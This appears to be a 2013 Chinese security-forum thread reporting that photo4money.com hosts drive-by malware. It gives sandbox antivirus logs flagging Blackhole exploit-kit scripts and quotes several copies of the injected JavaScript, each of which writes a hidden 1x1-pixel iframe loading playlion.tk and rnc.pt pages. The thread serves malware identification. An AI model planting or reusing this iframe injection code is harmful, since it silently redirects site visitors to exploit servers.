http://photo4money.com/【挂马 by蓝核哀酱很多马】

显示全部楼层 · 发表于 2013-4-11 16:31:59

本帖最后由蓝核于 2013-4-11 17:29 编辑

2013/4/11 16:30:50 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\action[1].js JS/Exploit-Blacole.eu (特洛伊)
2013/4/11 16:30:51 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F3U0MTCG\popup[1].js JS/Exploit-Blacole.eu (特洛伊)
2013/4/11 16:30:51 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F3U0MTCG\script[1].js JS/Exploit-Blacole.eu (特洛伊)
2013/4/11 16:30:51 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F3U0MTCG\stuff[1].js JS/Exploit-Blacole.eu (特洛伊)
2013/4/11 16:30:54 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00000b49.js JS/Exploit-Blacole.le (特洛伊)
2013/4/11 16:30:54 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00004150.js JS/Exploit-Blacole.le (特洛伊)
2013/4/11 16:30:54 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00005083.js JS/Exploit-Blacole.le (特洛伊)
2013/4/11 16:30:54 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00005ed3.js JS/Exploit-Blacole.le (特洛伊)
2013/4/11 16:30:55 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00006f79.js JS/Exploit-Blacole.le (特洛伊)
2013/4/11 16:30:55 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00007ba9.js JS/Exploit-Blacole.le (特洛伊)

显示全部楼层 · 发表于 2013-4-11 16:53:06

(function () {
var e = document.createElement('iframe');
e.src = 'http://playlion.tk/dtd.php';
e.style.position = 'absolute';
e.style.border = '0';
e.style.height = '1px';
e.style.width = '1px';
e.style.left = '1px';
e.style.top = '1px';
if (!document.getElementById('e')) {
document.write('<div id=\'e\'></div>');
document.getElementById('e').appendChild(e);
}
})();

复制代码

(function () {
var kjzi = document.createElement('iframe');
kjzi.src = 'http://rnc.pt/crmgesfrota/count.php';
kjzi.style.position = 'absolute';
kjzi.style.border = '0';
kjzi.style.height = '1px';
kjzi.style.width = '1px';
kjzi.style.left = '1px';
kjzi.style.top = '1px';
if (!document.getElementById('kjzi')) {
document.write('<div id=\'kjzi\'></div>');
document.getElementById('kjzi').appendChild(kjzi);
}
})();

复制代码

(function () {
var e = document.createElement('iframe');
e.src = 'http://playlion.tk/dtd.php';
e.style.position = 'absolute';
e.style.border = '0';
e.style.height = '1px';
e.style.width = '1px';
e.style.left = '1px';
e.style.top = '1px';
if (!document.getElementById('e')) {
document.write('<div id=\'e\'></div>');
document.getElementById('e').appendChild(e);
}
})();

复制代码

显示全部楼层 · 发表于 2013-4-11 16:54:36

src = 'http://playlion.tk/dtd.php

复制代码

src = 'http://rnc.pt/crmgesfrota/count.php'

复制代码

'http://playlion.tk/dtd.php

复制代码

显示全部楼层 · 发表于 2013-4-11 17:02:48

(function () {
var e = document.createElement('iframe');

e.src = 'http://playlion.tk/dtd.ph
p';
e.style.position = 'absolute';
e.style.border = '0';
e.style.height = '1px';
e.s
tyle.width = '1px';
e.style.left = '1px';
e.style.top = '1px';

if (!document.getElement
ById('e')) {
      document.write('<div id=\'e\'></div>
');
      document.getElementById('e').appendChild(e);
}
})();

(function () {
var t = document.createElement('iframe');

t.src = 'http://rnc.pt/crmgesfrota
/count.php';
t.style.position = 'absolute';
t.style.border = '0';
t.style.height = '1px'
;
t.style.width = '1px';
t.style.left = '1px';
t.style.top = '1px';

if (!document.g
etElementById('t')) {
      document.write('<div id=\'t\'></div>
');
      document.getElementById('t').appendChild(t);
}
})();

<script type="text/javascript" src="/js/swfobject-2.2.min.js"></script>

<script src=
"http://mbox.offermatica.intuit.com/m2/intuit/mbox/standard?mboxHost=turbotax.com&mboxSession=136565
0426619-488947&mboxPage=1365650426619-488947&screenHeight=768&screenWidth=1024&browserWidth=1256&bro
wserHeight=605&browserTimeOffset=-420&colorDepth=24&mboxXDomain=x-only&mboxCount=1&ttcom_visitor=nul
l&priorityCode=3468337910&userSegmentation=&cs-uri-stem=%2Flp%2Fty12%2Fppc%2Ftmp5_5p.jsp&zna=0&cid=p
pc_ask_b_stan_dk_us_hv-brand-turbotax-main&ven=ask&kw=%7BsearchQuery%7D&skw=turbotax&UserHasNEAuthen
ticated=false&mbox=ttcom_redirect&mboxId=0&mboxTime=1365625247320&mboxURL=http%3A%2F%2Fturbotax.com%
2Flp%2Fty12%2Fppc%2Ftmp5_5p.jsp%3Fzna%3D0%26znp%3D1%26srqs%3Dnull%26cid%3Dppc_ask_b_stan_dk_us_hv-br
and-turbotax-main%26srid%3Dsr3_44471139_ak%26skw%3Dturbotax%26adid%3DByYourSide%26kw%3D%257BsearchQu
ery%257D%26ven%3Dask%26&mboxReferrer=https%3A%2F%2Fads.pureleads.com%2Fcrd%3FcString%3DzutGlRkCwaHn9
MfazSeVE6D9G)NKMDRylnMWk0EpA1nh))B3VmckatCy7cEIijGbuNn6wqMtv49zfu6WEcG4bPh4Y*lGE5qo8t7R9Ccpk7SV3dDKN
kgaQKxuAREex*6ypaWIlYmaIGn)fxwvEX82iBodduuxMuwb3foK8Tj*YQHCFQqQsmN942lqHWt*yq9cnq59txF0uATAq56RnXq4O
wxrj*G4CKVOs9US3Yn2g3BoEz3aQ0MMfkyaH9L*XSoLh3iS4Y2h1babr0wXKJHQRNAo0xrcrYtbFpmxM4Xyz8y5w69WxxLG8lg4v
XM0XseSkkdE2uVy7m)m5Jrn62uu0s9GVGZ3LbxyBotAp3o7C1P0bAwUNRFsvkT*9x9cjbKI&mboxVersion=40" language=
"JavaScript"></script>

<script src=
"http://mbox.offermatica.intuit.com/m2/intuit/mbox/standard?mboxHost=turbotax.com&mboxSession=136565
0426619-488947&mboxPage=1365650426619-488947&screenHeight=768&screenWidth=1024&browserWidth=1256&bro
wserHeight=605&browserTimeOffset=-420&colorDepth=24&mboxXDomain=x-only&mboxCount=2&ttcom_visitor=nul
l&priorityCode=3468337910&userSegmentation=&cs-uri-stem=%2Flp%2Fty12%2Fppc%2Ftmp5_5p.jsp&zna=0&cid=p
pc_ask_b_stan_dk_us_hv-brand-turbotax-main&ven=ask&kw=%7BsearchQuery%7D&skw=turbotax&UserHasNEAuthen
ticated=false&mbox=ttcom_metrics&mboxId=0&mboxTime=1365625248877&mboxURL=http%3A%2F%2Fturbotax.com%2
Flp%2Fty12%2Fppc%2Ftmp5_5p.jsp%3Fzna%3D0%26znp%3D1%26srqs%3Dnull%26cid%3Dppc_ask_b_stan_dk_us_hv-bra
nd-turbotax-main%26srid%3Dsr3_44471139_ak%26skw%3Dturbotax%26adid%3DByYourSide%26kw%3D%257BsearchQue
ry%257D%26ven%3Dask%26&mboxReferrer=https%3A%2F%2Fads.pureleads.com%2Fcrd%3FcString%3DzutGlRkCwaHn9M
fazSeVE6D9G)NKMDRylnMWk0EpA1nh))B3VmckatCy7cEIijGbuNn6wqMtv49zfu6WEcG4bPh4Y*lGE5qo8t7R9Ccpk7SV3dDKNk
gaQKxuAREex*6ypaWIlYmaIGn)fxwvEX82iBodduuxMuwb3foK8Tj*YQHCFQqQsmN942lqHWt*yq9cnq59txF0uATAq56RnXq4Ow
xrj*G4CKVOs9US3Yn2g3BoEz3aQ0MMfkyaH9L*XSoLh3iS4Y2h1babr0wXKJHQRNAo0xrcrYtbFpmxM4Xyz8y5w69WxxLG8lg4vX
M0XseSkkdE2uVy7m)m5Jrn62uu0s9GVGZ3LbxyBotAp3o7C1P0bAwUNRFsvkT*9x9cjbKI&mboxVersion=40" language=
"JavaScript"></script>

还真多。。。

[已鉴定] http://photo4money.com/【挂马 by蓝核 哀酱 很多马】

[已鉴定] http://photo4money.com/【挂马 by蓝核哀酱很多马】